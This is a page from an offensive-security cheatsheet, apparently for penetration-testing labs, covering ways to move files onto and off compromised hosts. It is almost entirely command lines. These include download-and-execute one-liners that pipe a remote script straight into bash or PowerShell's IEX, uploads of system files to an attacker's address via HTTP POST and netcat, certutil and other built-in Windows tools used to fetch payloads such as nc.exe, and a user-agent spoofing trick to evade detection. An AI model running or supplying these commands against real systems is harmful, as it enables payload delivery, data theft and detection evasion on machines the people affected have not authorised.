Cheatsheet
  • Documentation
  • Nmap
  • Ffuf
  • FTP
  • SMB
  • RPC
  • NFS
  • DNS
  • SMTP
  • IMAP / POP3
  • SNMP
  • SQL
  • Rsync
  • Certipy
  • CrackMapExec
  • Transferring Files
  • Windows Remote Management
  • Windows AV
  • Wordpress
  • Infrastructure Enumeration
  • Privilege Escalation
  • Docker Breakout
  • Shells
  • SSTI
  • XSS
  • Pivot
    • SSH Tunneling
    • Chisel
    • Ligolo-ng
    • Meterpreter
  • LDAP
  • Spray
  • Antivirus / EDR
  • Impacket
  • Bloodhound
  • Powershell
  • Kerberosting
  • Password Attacks
  • Command Injections
  • Sliver C2
  • Windows credentials
  • Windows persistance
  • VSCode Debug
Powered by GitBook
On this page
  • Simple Servers
  • Transfer Files
  • Validating File Transfers
  • Evading Detection
  • References

Transferring Files

Simple Servers

python3 -m http.server 8000
smbserver.py -smb2support share $(pwd)
smbserver.py -smb2support share $(pwd) -user qu35t -password qu35t
python3 -m pyftpdlib -p 21
python3 -m uploadserver
php -S 0.0.0.0:8000
ruby -run -ehttpd . -p8000

Transfer Files

wget http://10.10.10.10:8000/linpeas.sh -O linpeas.sh
curl http://10.10.10.10:8000/linpeas.sh -o /dev/shm/linpeas.sh
curl http://10.10.10.10:8000/linpeas.sh|bash

With SMB server.

copy file.txt \\10.10.10.10\share
copy \\10.10.10.10\share\nc.exe

net use n: \\10.10.10.10\share /user:qu35t qu35t
copy file.txt n:
copy n:\nc.exe

File download.

(New-Object Net.WebClient).DownloadFile('https://docs.qu35t.pw/file.ps1','C:\Users\Public\Downloads\file.ps1')
(New-Object Net.WebClient).DownloadFileAsync('https://docs.qu35t.pw/file.ps1','C:\Users\Public\Downloads\file.ps1')
IEX (New-Object Net.WebClient).DownloadString('https://docs.qu35t.pw/file.ps1')
(New-Object Net.WebClient).DownloadString('https://docs.qu35t.pw/file.ps1') | IEX
Invoke-WebRequest https://docs.qu35t.pw/file.ps1 -OutFile file.ps1
Invoke-WebRequest https://docs.qu35t.pw/file.ps1 -UseBasicParsing | IEX
Invoke-RestMethod https://docs.qu35t.pw/file.ps1 -OutFile file.ps1
certutil -urlcache -split -f http://10.10.10.10/nc.exede
certutil -verifyctl -split -f http://10.10.10.10/nc.exe
GfxDownloadWrapper.exe "http://10.10.10.10/nc.exe" "C:\Temp\nc.exe"

File upload.

Invoke-FileUpload -Uri http://10.10.10.10:8000/upload -File C:\Windows\System32\drivers\etc\hosts
$b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte))
Invoke-WebRequest -Uri http://10.10.10.10:8000/ -Method POST -Body $b64
scp linpeas.sh qu35t@10.10.10.10:/dev/shm/linpeas.sh
scp qu35t@10.10.10.10:/dev/shm/linpeas.sh .

Linux

Encode and decode from base64.

base64 linpeas.sh -w 0;echo
echo 'Base64 data'|base64 -d > linpeas.sh

Windows

Encode and decode from base64.

[Convert]::ToBase64String((Get-Content -path "C:\Windows\system32\drivers\etc\hosts" -Encoding byte))
[IO.File]::WriteAllBytes("C:\Users\Public\id_rsa", [Convert]::FromBase64String("BASE64 DATA"))

Check MD5 signature.

Get-FileHash C:\Users\Public\id_rsa -Algorithm md5 | select Hash
cat linpeas.sh|nc 10.10.10.10 8001
nc -lvnp 8001 > linpeas.sh

cat < /dev/tcp/10.10.10.10/443 > linpeas.sh

Connect to the target webserver.

exec 3<>/dev/tcp/10.10.10.10/80

HTTP GET request.

echo -e "GET /linpeas.sh HTTP/1.1\n\n">&3

Print the response.

cat <&3

Mounting a linux folder.

rdesktop 10.10.10.10 -d QU35T.pw -u administrator -p 'Password0@' -r disk:linux='/home/qu35t/files'
xfreerdp /v:10.10.10.10 /d:QU35T.pw /u:administrator /p:'Password0@' /drive:linux,/home/qu35t/files

Validating File Transfers

file linpeas.sh
md5sum linpeas.sh

Evading Detection

Listing out user agents.

[Microsoft.PowerShell.Commands.PSUserAgent].GetProperties() | Select-Object Name,@{label="User Agent";Expression={[Microsoft.PowerShell.Commands.PSUserAgent]::$($_.Name)}} | fl

With Chrome user agent.

Invoke-WebRequest http://10.10.10.10/nc.exe -UserAgent [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome -OutFile "C:\Users\Public\nc.exe"

References

  • GTFOBins

  • LOLBAS

PreviousCrackMapExecNextWindows Remote Management

Last updated 2 years ago